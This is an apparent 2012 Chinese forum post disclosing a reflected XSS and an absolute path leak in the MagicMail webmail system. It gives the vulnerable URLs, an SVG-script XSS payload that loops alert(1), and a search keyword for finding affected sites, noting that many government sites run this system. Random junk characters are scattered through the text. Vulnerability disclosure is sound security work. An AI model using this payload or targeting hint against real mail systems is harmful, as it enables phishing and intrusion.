今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
% Q7 I! h. z# j
. }& P/ \" g, p8 k8 S# P ; A; F1 L7 Q& Q3 V
包含 一个反射性XSS 以及 绝对路径泄漏- \1 Z: \( m( } C
看了看 貌似全部是linux的。
. S% E- [3 r* h1 B # G% D3 K* [% l6 I2 z
关键字:迈捷邮件系统 by MagicMail4 }- L+ K- ]" I( e Q- G
4 a& A: Q9 S$ P5 @$ G! Y3 _
可以看到很多政府网站都用这个邮件系统
9 X: H# b9 a5 U, f5 Y3 g
7 s. E/ Z l( K绝对路径 http://madman.in/index.php?login_type=declare&language=
7 L K' q( {3 u: N0 W% B! i
! I4 @" I3 d* q- s
8 V/ G: E: c! g+ w. ?0 ^1 d
8 O) ?, T7 p. D7 J; c# {# M- lXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E! {( F$ P5 `. N. I
5 Q4 Q2 @' |# n5 S) b* |' x# @! a
9 o# ~& l0 I% k- y' b* Q' ~7 a6 F, i) d6 s% T; c* V
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
+ M) ^7 w9 e V; R( U" Y
- k0 J$ J V6 z8 k" ]* x修复方案:看官方补丁吧。; O$ [) `3 |$ j$ N2 ^6 l
|
发表于 2012-11-9 20:38:41
收藏
支持
反对